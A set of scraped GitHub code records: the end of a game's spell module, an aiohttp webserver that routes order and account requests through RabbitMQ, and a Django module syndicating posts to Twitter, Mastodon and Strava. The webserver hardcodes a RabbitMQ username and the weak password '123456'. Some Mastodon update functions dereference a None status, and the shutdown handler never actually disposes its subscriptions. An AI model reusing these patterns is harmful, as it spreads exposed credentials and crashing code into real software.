self.caster.Take_Damage(-1)\n\n biggerhitlist = []\n for monster in self.MONSTERSTATE:\n if abs(monster.x - self.x) < 400:\n if monster not in biggerhitlist:\n biggerhitlist.append(monster)\n for monster in biggerhitlist:\n damage = 1\n monster.react_to_damage(int(damage))\n self.fvm = monster\n self.fvd = damage\n\n\n while None in self.bombs:\n self.bombs.remove(None)\n","repo_name":"ardentryst/ardentryst","sub_path":"magic.py","file_name":"magic.py","file_ext":"py","file_size_in_byte":21457,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"37"} +{"seq_id":"24517077928","text":"# Built-in library\nimport asyncio\nimport logging\nimport time\n\n# Third-party library\nimport rx.operators as ops\nimport prometheus_client\nfrom prometheus_client import Gauge, Summary, Counter, CONTENT_TYPE_LATEST\nfrom rx.subject import Subject\nfrom rx.scheduler.eventloop import AsyncIOScheduler\nfrom aiohttp import web, ClientSession\nfrom aio_pika import connect_robust\n\n# Costum library\nfrom handler import OrderHandler, AccountHandler\n\n# Log configuration\nLOG_REQUEST_FORMAT = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s')\nLOG_REQUEST_HANDLER = logging.FileHandler('request.log')\nLOG_REQUEST_HANDLER.setFormatter(LOG_REQUEST_FORMAT)\n\nclass Webserver:\n def __init__(self):\n self.app = web.Application()\n self.webservice = ClientSession()\n self.loop = asyncio.get_event_loop()\n self.request = Subject() # Requests observable object\n self.subscriptions = [] # List for containing disposable request observer\n self.rmqConn = None\n self.channel = {}\n self.orderHandler = OrderHandler()\n self.accountHandler = AccountHandler()\n self.requestLogger = logging.getLogger('request')\n self.requestLogger.addHandler(LOG_REQUEST_HANDLER)\n self.requestLogger.setLevel(logging.INFO)\n\n\n def logRequest(self, request : web.Request):\n self.requestLogger.info(f\"Incoming request <- {request.remote}|{request.method}|{request.path}\")\n\n # General handler for dispatching request to every request observers\n async def dispatcher(self, request: web.Request) -> web.Response:\n startTime = time.time()\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).inc()\n future = asyncio.Future()\n request['future'] = future\n request['loop'] = self.loop\n\n try:\n body = await request.json()\n request['body'] = body\n request['queue'] = request.path.replace('/','')\n request['channel'] = self.channel[request.path]\n except Exception as e:\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n return web.json_response({'status':'FAIL', 'order_id': None, 'client_ref': None, 'reason':'Failed to parse request body'}, status=400)\n\n self.request.on_next(request) # Pass the request to the observers\n\n await future\n result = future.result() # Get the result response from the observers\n\n latency = time.time() - startTime\n self.app['REQUEST_LATENCY'].labels(request.path, request.method).observe(latency)\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n\n return result\n\n async def accountQuery(self, request: web.Request) -> web.Response:\n startTime = time.time()\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).inc()\n account = request.match_info['account']\n\n response = {'results': []}\n async with self.webservice.get(f'http://localhost:8001/accounts/{account}') as resp:\n response = await resp.json()\n\n latency = time.time() - startTime\n self.app['REQUEST_LATENCY'].labels(request.path, request.method).observe(latency)\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n\n return web.json_response(response)\n\n async def orderQuery(self, request: web.Request) -> web.Response:\n startTime = time.time()\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).inc()\n account = request.match_info['account']\n\n response = {'results': []}\n async with self.webservice.get(f'http://localhost:8002/orders/{account}') as resp:\n response = await resp.json()\n\n latency = time.time() - startTime\n self.app['REQUEST_LATENCY'].labels(request.path, request.method).observe(latency)\n self.app['REQUEST_PROGRESS'].labels(request.path, request.method).dec()\n self.app['REQUEST_COUNT'].labels(request.path, request.method).inc()\n\n return web.json_response(response)\n\n async def metrics(self, request: web.Request) -> web.Response:\n resp = web.Response(body=prometheus_client.generate_latest())\n resp.content_type = CONTENT_TYPE_LATEST\n return resp\n\n async def on_shutdown(self, app: web.Application):\n await self.rmqConn.close()\n map(lambda i: i.dispose(), self.subscriptions)\n\n\n async def init(self):\n self.app['REQUEST_COUNT'] = Counter('request_total', 'Total Incoming Request', ('path', 'method'), unit='requests')\n self.app['REQUEST_LATENCY'] = Summary('request_latency', 'Request Process Time', ('path', 'method'), unit='seconds')\n self.app['REQUEST_PROGRESS'] = Gauge('request_progress', 'Request in Progress', ('path', 'method'), unit='requests')\n\n # Establish connection to RabbitMQ\n self.rmqConn = await connect_robust(login='ikhwanrnurzaman', password='123456')\n\n # Establish channel for order request and declare order queue\n self.channel['/order'] = await self.rmqConn.channel()\n await self.channel['/order'].declare_queue('order', durable=True)\n\n # Establish channel for account request and declare account queue\n self.channel['/account'] = await self.rmqConn.channel()\n await self.channel['/account'].declare_queue('account', durable=True)\n\n # Create disposable request observer for handling order request. Only request to /order will be passed to OrderHandler\n dispose = self.request.pipe(\n ops.filter(lambda i : i.path == '/order'),\n ops.do_action(self.logRequest),\n ops.filter(self.orderHandler.orderVerificator)\n ).subscribe(self.orderHandler, scheduler=AsyncIOScheduler)\n self.subscriptions.append(dispose)\n\n # Create disposable request observer for handling account request. Only request to /account will be passed to OrderHandler\n dispose = self.request.pipe(\n ops.filter(lambda i : i.path == '/account'),\n ops.do_action(self.logRequest),\n ops.filter(self.accountHandler.accountVerificator)\n ).subscribe(self.accountHandler, scheduler=AsyncIOScheduler)\n self.subscriptions.append(dispose)\n\n self.app.router.add_post('/order', self.dispatcher, name='order')\n self.app.router.add_get('/orders/{account}', self.orderQuery)\n self.app.router.add_post('/account', self.dispatcher, name='account')\n self.app.router.add_get('/accounts/{account}', self.accountQuery)\n self.app.router.add_get('/metrics', self.metrics)\n self.app.on_shutdown.append(self.on_shutdown)\n\n return self.app\n\n def run(self):\n web.run_app(self.init())\n\nwebserver = Webserver()\nwebserver.run()","repo_name":"irnurzaman/reactive-webserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1465617730","text":"from typing import Any, Dict, Tuple\nfrom urllib.parse import urlparse\nimport re\n\nimport tweepy\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import (GenericForeignKey,\n GenericRelation)\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\n\nfrom syndications.mastodon_client import Client as MastodonClient\nfrom django.db.models import UniqueConstraint\nimport bleach\nfrom webmentions.models import OutgoingContent\nfrom django.urls import reverse\n\n# Create your models here.\nclass Syndication():\n name = models.TextField(max_length=50)\n url = models.TextField(max_length=2000)\n\n @staticmethod\n def get_twitter_v2_client():\n return tweepy.Client(\n consumer_key=settings.TWITTER_CONSUMER_KEY, \n consumer_secret=settings.TWITTER_CONSUMER_SECRET,\n access_token=settings.TWITTER_ACCESS_TOKEN_KEY,\n access_token_secret=settings.TWITTER_ACCESS_TOKEN_SECRET\n )\n\n @staticmethod\n def get_twitter_v1_client():\n auth = tweepy.OAuthHandler(settings.TWITTER_CONSUMER_KEY, settings.TWITTER_CONSUMER_SECRET)\n auth.set_access_token(settings.TWITTER_ACCESS_TOKEN_KEY, settings.TWITTER_ACCESS_TOKEN_SECRET)\n \n return tweepy.API(auth)\n\n @staticmethod\n def syndicate_to_twitter(update=None, media=None):\n client = Syndication.get_twitter_v2_client()\n media_ids = None\n\n if media is not None:\n api = Syndication.get_twitter_v1_client()\n media_response = api.media_upload(media.filename, file=media.file)\n media_id = media_response.media_id_string\n api.create_media_metadata(media_id, media.alt_text)\n\n media_ids = [media_id]\n\n response = client.create_tweet(text=update.status, in_reply_to_tweet_id=update.in_reply_to_status_id, media_ids=media_ids, user_auth=True)\n return response\n\n @staticmethod\n def delete_from_twitter(id_str):\n client = Syndication.get_twitter_v2_client()\n \n response = client.delete_tweet(id_str, user_auth=True)\n return response\n\n @staticmethod\n def syndicate_to_mastodon(status=None, media=None):\n if media is not None:\n response = MastodonClient.post_media(media.file, media.thumbnail, media.description, media.focus)\n\n if status is not None:\n status.media_ids = [response['id']]\n\n return MastodonClient.post_status(status.status, status.idempotency_key, status.in_reply_to_id, status.media_ids)\n \n @staticmethod\n def favorite_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.favorite_status(id)\n \n @staticmethod\n def unfavorite_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.unfavorite_status(id)\n \n @staticmethod\n def boost_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.boost_status(id)\n \n @staticmethod\n def unboost_on_mastodon(id=None):\n if id is None:\n return\n \n return MastodonClient.unboost_status(id)\n\n @staticmethod\n def delete_from_mastodon(id):\n return MastodonClient.delete_status(id)\n \n @staticmethod\n def update_mastodon_replies(id):\n status = MastodonStatus.objects.filter(id_str=id).first()\n\n if status is None:\n replies = MastodonReply.objects.filter(in_reply_to_id_str=id)\n for reply in replies:\n reply.delete()\n return\n\n context = MastodonClient.get_status_context(id)\n\n if context is None:\n return\n \n if context.get(\"descendants\") is None:\n replies = MastodonReply.objects.filter(in_reply_to_id_str=id)\n for reply in replies:\n reply.delete()\n return\n \n processed_ids = []\n \n for descendent in context[\"descendants\"]:\n if descendent.get(\"in_reply_to_id\") != id:\n continue\n\n descendent_status = MastodonClient.get_status(descendent.get(\"id\"))\n\n content = descendent_status[\"content\"]\n content = bleach.clean(content, tags=bleach.sanitizer.ALLOWED_TAGS.union(('p', 'br')))\n content = bleach.linkify(content)\n\n MastodonReply.objects.update_or_create(\n id_str=descendent_status[\"id\"], \n defaults={\n 'in_reply_to_id_str':descendent_status[\"in_reply_to_id\"],\n 'content':content,\n 'author_name':descendent_status[\"account\"].get(\"display_name\"),\n 'author_url':descendent_status[\"account\"].get(\"url\"),\n 'author_photo':descendent_status[\"account\"].get(\"avatar_static\"),\n 'published':descendent_status[\"created_at\"],\n 'url':descendent_status[\"url\"],\n 'reply_to_url':status.content_object.get_permalink()\n } \n )\n\n processed_ids.append(descendent_status[\"id\"])\n\n replies = MastodonReply.objects.filter(in_reply_to_id_str=status.id_str).exclude(id_str__in=processed_ids)\n for reply in replies:\n reply.delete()\n\n @staticmethod\n def update_mastodon_boosts(id):\n print('updating mastodon boosts for status ' + id)\n status = MastodonStatus.objects.filter(id_str=id).first()\n\n if status is None:\n print('status is none')\n boosts = MastodonBoost.objects.filter(boost_of_id_str=status.id_str)\n for boost in boosts:\n boost.delete()\n return\n\n accounts = MastodonClient.get_status_boost_accounts_all(id)\n\n if accounts is None:\n print('accounts is none')\n boosts = MastodonBoost.objects.filter(boost_of_id_str=status.id_str)\n for boost in boosts:\n boost.delete()\n return\n \n processed_ids = []\n \n print(str(len(accounts)) + ' accounts to process')\n for account in accounts:\n boost = MastodonBoost.objects.update_or_create(\n account_id_str=account[\"id\"],\n boost_of_id_str=status.id_str,\n defaults={\n 'url': status.url,\n 'author_name': account[\"display_name\"],\n 'author_url': account[\"url\"],\n 'author_photo': account[\"avatar_static\"],\n 'boost_of_id_str': status.id_str,\n 'repost_of_url': status.content_object.get_permalink()\n }\n )[0]\n\n boost_status = MastodonClient.get_account_status_by_reblog_of_id(reblog_of_id=boost.boost_of_id_str, account_id=boost.account_id_str)\n\n processed_ids.append(account[\"id\"])\n\n if boost_status is None:\n print('no status found')\n continue\n \n print('boost status id ', boost_status.get('id'))\n boost.published = boost_status.get(\"created_at\")\n boost.save()\n\n \n print(str(len(processed_ids)) + ' boosts processed')\n boosts = MastodonBoost.objects.filter(boost_of_id_str=status.id_str).exclude(account_id_str__in=processed_ids)\n \n print(str(len(boosts)) + ' boosts to remove')\n for boost in boosts:\n boost.delete()\n\n @staticmethod\n def update_mastodon_favourites(id):\n status = MastodonStatus.objects.filter(id_str=id).first()\n\n if status is None:\n favourites = MastodonFavourite.objects.filter(like_of_url=status.id_str)\n for favourite in favourites:\n favourite.delete()\n return\n\n accounts = MastodonClient.get_status_favorite_accounts_all(id)\n \n if accounts is None:\n favourites = MastodonFavourite.objects.filter(like_of_url=status.id_str)\n for favourite in favourites:\n favourite.delete()\n return\n \n processed_ids = []\n\n for account in accounts:\n MastodonFavourite.objects.update_or_create(\n account_id_str=account[\"id\"],\n favourite_of_id_str=status.id_str,\n defaults={\n 'url':status.url,\n 'author_name':account[\"display_name\"],\n 'author_url':account[\"url\"],\n 'author_photo':account[\"avatar_static\"],\n 'favourite_of_id_str':status.id_str,\n 'like_of_url':status.content_object.get_permalink()\n }\n ) \n\n processed_ids.append(account[\"id\"])\n\n favourites = MastodonFavourite.objects.all().filter(favourite_of_id_str=status.id_str).exclude(account_id_str__in=processed_ids)\n\n for favourite in favourites:\n favourite.delete()\n\n class Meta:\n abstract = True\n\nclass TwitterUser(models.Model):\n id_str = models.CharField(max_length=40,primary_key=True)\n name = models.CharField(max_length=100)\n screen_name = models.CharField(max_length=30)\n\nclass Tweet(models.Model):\n id_str = models.CharField(max_length=40)\n created_at = models.DateTimeField(null=True)\n screen_name = models.CharField(max_length=30)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n full_text = models.CharField(max_length=560, null=True)\n user = models.ForeignKey(TwitterUser, on_delete=models.PROTECT, related_name='tweets', null=True)\n in_reply_to_status_id_str=models.CharField(max_length=40, blank=True, null=True)\n in_reply_to_screen_name=models.CharField(max_length=100, blank=True, null=True)\n\n def get_url(self):\n screen_name = self.screen_name\n\n if self.user is not None:\n screen_name = self.user.screen_name\n\n return f'https://twitter.com/{screen_name}/status/{self.id_str}'\n\n def to_syndication(self):\n return Syndication(name='Twitter',url=self.get_url())\n\nclass TwitterSyndicatable(models.Model):\n syndicated_to_twitter = models.DateTimeField(null=True)\n syndicate_to_twitter = models.BooleanField(default=False)\n tweet = GenericRelation(Tweet)\n tweet_length_limit = 280\n tweet_link_length = 23\n\n def get_tweet_datetime(self):\n tweet_created_at = self.tweet.get().created_at\n\n if tweet_created_at is not None:\n return tweet_created_at\n \n return self.syndicated_to_twitter\n \n def is_syndicated_to_twitter(self):\n return self.tweet.all().exists()\n\n def to_twitter_status(self): \n \"\"\"Return the content that should be the tweet status.\"\"\"\n raise NotImplementedError(\"to_twitter_status not implemented.\")\n \n def get_twitter_reply_to_url(self):\n \"\"\"Return the url that should be checked for the in_reply_to_id.\"\"\"\n raise NotImplementedError(\"get_twitter_reply_to_url not implemented.\")\n\n def to_twitter_status_update(self):\n \"\"\"Converts the model to an object able to post to Twitter.\"\"\"\n\n # Get the basic Twitter Status object from the content.\n update = TwitterStatusUpdate(self.to_twitter_status())\n\n # If Note is not replying to anything, return the update as it is.\n if self.get_twitter_reply_to_url() is None:\n return update\n\n # Check if the reply to url is a twitter url, if it's a twitter status,\n # parse the screen name and status id from it.\n is_twitter_url, is_twitter_status, reply_to_screen_name, reply_to_status_id = TwitterSyndicatable.parse_twitter_url(self.get_twitter_reply_to_url())\n\n # If the reply to url is not a twitter url and is not a twitter status,\n # append the reply to url to the end of the Note content.\n if not is_twitter_url or not is_twitter_status:\n update.status = f'{update.status} {self.in_reply_to}'\n return update\n\n # Otherwise it's a reply. Add that data to the update object.\n update.in_reply_to_status_id = reply_to_status_id\n return update\n \n def has_twitter_media(self):\n \"\"\"Returns True if the Model has media to upload.\"\"\"\n return False\n \n def get_twitter_media_image_field(self):\n \"\"\"Returns the ImageField for the media.\"\"\"\n raise NotImplementedError(\"get_twitter_media_image_field not implemented.\")\n\n def get_twitter__media_alttext(self):\n \"\"\"Returns the description for the media.\"\"\"\n raise NotImplementedError(\"get_twitter__media_alttext not implemented.\")\n\n def get_twitter_media(self):\n if not self.has_twitter_media():\n return None\n\n media = self.get_twitter_media_image_field()\n\n media_upload = TwitterMedia(media.name.split('/')[-1], file=media, alt_text=self.get_twitter__media_alttext())\n return media_upload \n\n @staticmethod\n def parse_twitter_url(url):\n o = urlparse(url)\n\n if o.netloc != 'twitter.com':\n return False, False, None, None\n\n pieces = o.path.split(\"/\")\n\n if len(pieces) < 4:\n return True, False, None, None\n\n if pieces[2].lower() != 'status':\n return True, False, None, None\n \n return True, True, pieces[1], pieces[3]\n\n class Meta:\n abstract = True\n\nclass TwitterStatusUpdate(object):\n def __init__(self, status=None, in_reply_to_status_id=None, attachment_url=None):\n self.status = status\n self.in_reply_to_status_id = in_reply_to_status_id\n self.attachment_url = attachment_url\n\nclass TwitterMedia(object):\n def __init__(self, filename, file=None, alt_text=None):\n self.filename = filename\n self.file = file\n self.alt_text = alt_text\n\n#class StravaLatLng(models.Model):\n# lat = models.FloatField()\n# lng = models.FloatField()\n#\n# class Meta:\n# abstract = True\n#\n#class StravaPolylineMap(models.Model):\n# polyline = models.Text()\n# summary_polyline = models.Text()\n#\n# class Meta:\n# abstract = True\n#\n#class PhotosSummaryPrimary(models.Model):\n# source = models.IntegerField()\n# unique_id = models.CharField(max_length=255)\n# urls = models.TextField()\n#\n# class Meta:\n# abstract = True\n#\n#class PhotosSummary(models.Model):\n# count = models.IntegerField()\n# primary = models.OneToOneField(PhotosSummaryPrimary, on_delete=models.CASCADE)\n#\n# class Meta:\n# abstract = True\n#\n#class SummaryGear(models.Model):\n# strava_id = models.CharField(max_length=255)\n# resource_state = models.IntegerField()\n# primary = models.BooleanField()\n# name = models.Text()\n# distance = models.FloatField()\n#\n# class Meta:\n# abstract = True\n#\nclass StravaActivity(models.Model):\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n strava_id = models.BigIntegerField()\n #external_id = models.CharField(max_length=255)\n #upload_id = models.BigIntegerField()\n athlete = models.IntegerField()\n #name = models.Text()\n distance = models.FloatField()\n moving_time = models.IntegerField()\n elapsed_time = models.IntegerField()\n total_elevation_gain = models.FloatField()\n #elev_high = models.FloatField()\n #elev_high = models.FloatField()\n type = models.CharField(max_length=30)\n start_date = models.DateTimeField()\n start_date_local = models.DateTimeField()\n timezone = models.CharField(max_length=50)\n #start_latlng = models.OneToOneField(StravaLatLng, on_delete=models.CASCADE)\n #end_latlng = models.OneToOneField(StravaLatLng, on_delete=models.CASCADE)\n #achievement_count = models.IntegerField()\n #kudos_count = models.IntegerField()\n #comment_count = models.IntegerField()\n #athlete_count = models.IntegerField()\n #photo_count = models.IntegerField()\n #total_photo_count = models.IntegerField()\n #map = models.OneToOneField(StravaPolylineMap, on_delete=models.CASCADE)\n #trainer = models.BooleanField()\n #commute = models.BooleanField()\n #manual = models.BooleanField()\n private = models.BooleanField()\n #flagged = models.BooleanField()\n #workout_type = models.IntegerField()\n #upload_id_str = models.CharField(max_length=128)\n #average_speed = models.FloatField()\n #max_speed = models.FloatField()\n #has_kudoed = models.BooleanField()\n #gear_id = models.CharField(255)\n #kilojoules = models.FloatField()\n #average_watts = models.FloatField()\n #device_watts = models.BooleanField()\n #max_watts = models.IntegerField()\n #weighted_average_watts = models.IntegerField()\n #description = models.TextField(null=True)\n #photos = models.OneToOneField(StravaPhotosSummary, on_delete=models.CASCADE)\n #gear = models.ForeignKey(SummaryGear)\n #calories = models.FloatField()\n\n def get_url(self):\n return f'https://www.strava.com/activities/{self.strava_id}'\n\n#class DetailedSegmentEfford(models.Model):\n# strava_id = models.BigIntegerField()\n# elapsed_time = models.IntegerField()\n# start_date = models.DateTimeField()\n# start_date_local = models.DateTimeField()\n# distance = models.FloatField()\n# is_kom = models.BooleanField()\n# name = models.TextField()\n# activity = models.ForeignKey(StravaActivity, on_delete=models.CASCADE)\n# athlete = models.IntegerField()\n# moving_time = models.IntegerField()\n# start_index = models.IntegerField()\n# end_index = models.IntegerField()\n# average_cadence = models.FloatField()\n# average_watts = models.FloatField()\n# device_watts = models.BooleanField()\n# average_heartrate = models.FloatField()\n# max_heartrate = models.FloatField()\n#\n# class Meta:\n# abstract = True\n\nclass StravaSyndicatable(models.Model):\n strava_activity = GenericRelation(StravaActivity)\n \n def is_syndicated_to_strava(self):\n return self.strava_activity.all().exists()\n\n class Meta:\n abstract = True\n\nclass StravaWebhook(models.Model):\n verify_token = models.CharField(max_length=32)\n subscription_id = models.IntegerField(null=True)\n\n def __str__(self):\n return 'Webhook: {}'.format(self.verify_token)\n\nclass StravaWebhookEvent(models.Model):\n object_type = models.CharField(max_length=16)\n object_id = models.BigIntegerField()\n aspect_type = models.CharField(max_length=12)\n updates = models.TextField()\n owner_id = models.BigIntegerField()\n subscription_id = models.IntegerField()\n event_time = models.BigIntegerField()\n\n# \n# MASTODON SYNDICATION FEATURE\n# \nclass MastodonStatus(models.Model):\n \"\"\"\n The Mastodon Status from Mastodon.\n \"\"\"\n id_str = models.CharField(max_length=40)\n url = models.CharField(max_length=2048)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n created_at = models.DateTimeField()\n\n def save(self,*args,**kwargs):\n super().save(*args,**kwargs)\n \n MastodonStatusesToProcess.objects.get_or_create(id_str=self.id_str)\n\nclass MastodonStatusUpdate(object):\n \"\"\"\n An object to contain the necessary data to publish a Mastodon Status.\n \"\"\"\n def __init__(self, status=None, idempotency_key=None, in_reply_to_id=None, tags=None, media_ids=None):\n self.status = status\n self.idempotency_key = idempotency_key\n self.in_reply_to_id = in_reply_to_id\n self.tags = tags\n self.media_ids = media_ids\n\nclass MastodonMediaUpload(object):\n \"\"\"\n An object to contain the necessary data to publish a Mastodon \n Media attachment.\n \"\"\"\n def __init__(self, file, thumbnail=None, description=None, focus=None):\n self.file = file\n self.thumbnail = thumbnail\n self.description = description\n self.focus = focus\n\n\nclass MastodonSyndicatable(models.Model):\n \"\"\"\n An abstract class to be inherited by Models that want to syndicate\n to Mastodon.\n \"\"\"\n\n syndicated_to_mastodon = models.DateTimeField(null=True)\n syndicate_to_mastodon = models.BooleanField(default=False)\n mastodon_status = GenericRelation(MastodonStatus, related_query_name=\"mastodon_status\")\n \n def is_syndicated_to_mastodon(self):\n return self.mastodon_status.all().exists()\n\n def to_mastodon_status(self):\n \"\"\"Return the content that should be the Status of a mastodon post.\"\"\"\n raise NotImplementedError(\"to_mastodon_status not implemented.\")\n \n def get_mastodon_idempotency_key(self):\n \"\"\"Return a string to use as the Idempotency key for Status posts.\"\"\"\n raise NotImplementedError(\"get_mastodon_idempotency_key not implemented.\")\n \n def get_mastodon_reply_to_url(self):\n \"\"\"Return the url that should be checked for the in_reply_to_id.\"\"\"\n raise NotImplementedError(\"get_mastodon_reply_to_url not implemented.\")\n\n def get_mastodon_tags(self):\n \"\"\"Return the tags that should be parsed and added to the status.\"\"\"\n raise NotImplementedError(\"get_mastodon_tags not implemented.\")\n \n def has_mastodon_media(self):\n \"\"\"Returns True if the Model has media to upload.\"\"\"\n return False\n \n def is_mastodon_favorite(self):\n \"\"\"Returns True if the interaction is a boost.\"\"\"\n return False\n \n def is_mastodon_boost(self):\n \"\"\"Returns True if the interaction is a boost.\"\"\"\n return False\n \n def is_mastodon_url(self, url):\n o = urlparse(url)\n\n return o.netloc == \"mastodon.online\"\n \n def get_mastodon_url(self):\n raise NotImplementedError(\"get_mastodon_url not implemented.\")\n \n def get_status_id_from_url(self):\n url = self.get_mastodon_url()\n\n if not url:\n return None\n \n if not self.is_mastodon_url(url):\n return None\n \n o = urlparse(url)\n\n path_parts = o.path.split(\"/\")\n\n if len(path_parts) != 3:\n return None\n \n return path_parts[2]\n\n def get_mastodon_media_image_field(self):\n \"\"\"Returns the ImageField for the media.\"\"\"\n raise NotImplementedError(\"get_mastodon_media_image_field not implemented.\")\n\n def get_mastodon_media_description(self):\n \"\"\"Returns the description for the media.\"\"\"\n raise NotImplementedError(\"get_mastodon_media_description not implemented.\")\n\n def get_mastodon_status_update(self):\n # Get the basic Mastodon Status object from the content.\n status = MastodonStatusUpdate(self.to_mastodon_status())\n\n status.idempotency_key = self.get_mastodon_idempotency_key()\n\n # Check the reply for a Mastodon Id.\n in_reply_to_id = MastodonSyndicatable.parse_mastodon_url(self.get_mastodon_reply_to_url())\n\n # If no Mastodon Id, append the reply to url to the end of the \n # Note content.\n if self.get_mastodon_reply_to_url() is not None and in_reply_to_id is None:\n status.status = f'{self.content}\\n\\n{self.in_reply_to}'\n # Otherwise add the reply_to_id\n elif self.get_mastodon_reply_to_url() is not None and in_reply_to_id is not None:\n status.in_reply_to_id = in_reply_to_id\n \n status.status = MastodonSyndicatable.add_hashtags(status.status, self.get_mastodon_tags())\n \n return status\n\n def get_mastodon_media_upload(self):\n if not self.has_mastodon_media():\n return None\n\n media = self.get_mastodon_media_image_field()\n # https://stackoverflow.com/a/35974071/814492\n file = (media.name.split('/')[-1], media)\n\n media_upload = MastodonMediaUpload(file, description=self.get_mastodon_media_description())\n return media_upload\n\n @staticmethod\n def parse_mastodon_url(url):\n o = urlparse(url)\n\n if o.netloc.lower() != settings.MASTODON_INSTANCE.lower():\n return None\n\n pieces = o.path.split(\"/\")\n if len(pieces) < 3:\n return None \n \n mastodonUserPattern = re.compile(\"^@(.+)$\")\n mastodonStatusIdPattern = re.compile(\"^(.+)$\")\n\n if bool(mastodonUserPattern.match(pieces[1])) and bool(mastodonStatusIdPattern.match(pieces[2])): \n return pieces[2]\n\n return None\n \n @staticmethod\n def add_hashtags(status, tags):\n tagsToAppend = list()\n\n for tag in tags:\n tagsToAppend.append(tag.to_hashtag())\n\n if len(tagsToAppend) > 0:\n status += \"\\n\\n\"\n status += \" \".join(tagsToAppend)\n\n return status\n\n\n class Meta:\n abstract = True\n\nclass Reply(models.Model):\n title = models.CharField(max_length=64, null=True, blank=True)\n reply_to_url = models.URLField()\n content = models.TextField()\n author_name = models.CharField(max_length=100, null=True, blank=True)\n author_url = models.URLField(null=True, blank=True)\n author_photo = models.URLField(null=True, blank=True)\n published = models.DateTimeField(null=True, blank=True)\n url = models.URLField()\n updated_at = models.DateTimeField(auto_now=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\nclass Repost(models.Model):\n repost_of_url = models.URLField()\n author_name = models.CharField(max_length=100, null=True, blank=True)\n author_url = models.URLField(null=True, blank=True)\n author_photo = models.URLField(null=True, blank=True)\n published = models.DateTimeField(null=True, blank=True)\n url = models.URLField()\n updated_at = models.DateTimeField(auto_now=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\nclass Like(models.Model):\n like_of_url = models.URLField()\n author_name = models.CharField(max_length=100, null=True, blank=True)\n author_url = models.URLField(null=True, blank=True)\n author_photo = models.URLField(null=True, blank=True)\n published = models.DateTimeField(null=True, blank=True)\n url = models.URLField()\n updated_at = models.DateTimeField(auto_now=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\nclass MastodonReply(Reply):\n id_str = models.CharField(max_length=40)\n in_reply_to_id_str = models.CharField(max_length=40)\n \n def get_permalink(self):\n return settings.SITE_URL + reverse('syndications:reply', args=[self.id])\n\n def delete(self, *args, **kwargs) -> Tuple[int, Dict[str, int]]:\n permalink = self.get_permalink()\n super().delete(*args, **kwargs)\n OutgoingContent.objects.get_or_create(content_url=permalink)\n\n def save(self, *args, **kwargs):\n super().save(*args,**kwargs)\n \n permalink = settings.SITE_URL + reverse('syndications:reply', args=[self.id])\n OutgoingContent.objects.get_or_create(content_url=permalink)\n MastodonStatusesToProcess.objects.get_or_create(id_str=self.in_reply_to_id_str)\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"id_str\",),\n name=\"unique_mastodon_id\",\n ),\n ]\n\nclass MastodonBoost(Repost):\n account_id_str = models.CharField(max_length=40)\n boost_of_id_str = models.CharField(max_length=40)\n \n def get_permalink(self):\n return settings.SITE_URL + reverse('syndications:repost', args=[self.id])\n\n def delete(self, *args, **kwargs) -> Tuple[int, Dict[str, int]]:\n permalink = self.get_permalink()\n super().delete(*args, **kwargs)\n OutgoingContent.objects.get_or_create(content_url=permalink)\n\n def save(self, *args, **kwargs):\n super().save(*args,**kwargs)\n \n permalink = settings.SITE_URL + reverse('syndications:repost', args=[self.id])\n OutgoingContent.objects.get_or_create(content_url=permalink)\n MastodonStatusesToProcess.objects.get_or_create(id_str=self.boost_of_id_str)\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"account_id_str\", \"boost_of_id_str\"),\n name=\"unique_mastodon_account_id_str_boost_of_id_str\",\n ),\n ]\n\nclass MastodonFavourite(Like):\n account_id_str = models.CharField(max_length=40)\n favourite_of_id_str = models.CharField(max_length=40)\n\n def get_permalink(self):\n return settings.SITE_URL + reverse('syndications:like', args=[self.id])\n\n def delete(self, *args, **kwargs) -> Tuple[int, Dict[str, int]]:\n permalink = self.get_permalink()\n super().delete(*args, **kwargs)\n OutgoingContent.objects.get_or_create(content_url=permalink)\n\n def save(self, *args, **kwargs):\n super().save(*args,**kwargs)\n \n permalink = self.get_permalink()\n OutgoingContent.objects.get_or_create(content_url=permalink)\n MastodonStatusesToProcess.objects.get_or_create(id_str=self.favourite_of_id_str)\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=(\"account_id_str\", \"favourite_of_id_str\"),\n name=\"unique_mastodon_account_id_str_favourite_of_id_str\",\n ),\n ]\n\nclass MastodonStatusesToProcess(models.Model):\n id_str = models.CharField(max_length=40)\n result = models.TextField()\n\n def __str__(self) -> str:\n return self.id_str\n\n def process(self):\n try:\n Syndication.update_mastodon_replies(self.id_str) \n except Exception as e:\n self.result = str(e)\n self.save()\n return\n \n try:\n Syndication.update_mastodon_boosts(self.id_str) \n except Exception as e:\n self.result = str(e)\n self.save()\n return\n \n try:\n Syndication.update_mastodon_favourites(self.id_str) \n except Exception as e:\n self.result = str(e)\n self.save()\n return\n \n\n 